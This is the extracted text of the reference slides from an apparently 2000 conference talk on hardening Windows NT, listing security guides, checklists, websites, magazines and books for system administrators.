• Netbus and BackOrfice other examples of remote control programs

• WinVNC hijacks the NT GUI


NuGenSoftSources

• White papers– Securing Windows NT Installation, Microsoft, Oct 1997

• Backgrounder in MSDN library

• Hardcopy available from Nugen

– Windows NTSecurity Guidelines• Oftentimes referred to by MS publications

• Steve Sutton (Trusted Systems Services) and Scott Cothrell (National Security Agency); March, 1998

• Src: http://www.trustedsystems.com/tss_nsa_guide.htm

– Microsoft Internet Information Server 4.0 Security Checklist• Microsoft; March 2000

• Src: www.microsoft.com/technet/security

– Windows NT 4.0 Domain Controller Security Checklist• Microsoft; March 2000



NuGenSoftSources cont’d– Windows NT 4.0 System Administrator’s OS Handbook

• GSA, unknown time frame

• Src: http://bsp.cio.gov/ ... have to drill down

– Monitoring and Auditing for End Systems• MS; July 2000


• Microsoft Product Security bulletins– www.microsoft.com/technet/security

• Newsletters, email– Security Update from www.win2000mag.com– Security Wire Digest from www.infosecuritymag.com


NuGenSoftSources cont’d

• Online sampler... portals, conferences, etc.– www.sans.org

• Sell a step-by-step checklist for securing WinNT systems– Best practices, consensus of multiple experts– Recommended by folks who have used it

– www.ntsecurity.net– www.securityportal.com– www.icsa.net– www.antionline.com– www.securityfocus.com– www.counterpane.com– www.gocsi.com

• Print magazines– Windows2000 Magazine– Information Security... www.infosecuritymag.com– SC Magazine... www.infosecnews.com



• Books– Windows NT Security Guide

• Stephen A. Sutton

• 1997

• Addison-Wesley

– Inside Windows NT Server 4• Drey Heywood, et. al.

• 1997

• New Riders

– Windows NT Server 4: Security, Troubleshooting, and Optimization• Wayne Dalton, et. al.

• 1996

• New Riders

– Windows NT USer Administration• Ashley Meggit and Timothy Ritchey

• 1997

• O’Reilly



• Books cont’d– Maximum Security, 2nd Ed

• Anonymous

• 1998

• SAMS

– Hacker Proof: The Ultimate Guide to Network Security• Lars Klander

• 1997

• Jamsa Press

– Hacking Exposed• Stuart McClure, Joel Scambray, George Kurtz

• 1999

• Osborne/McGraw-Hill


NuGenSoft

Questions... Discussions

Documents

1 CERTConf 2000 | HardenedNT NuGenSoft Hardening Systems: Windows NT Stephen M. Nugen, CISSP NebraskaCERT [email protected] Presented to CERTConf 2000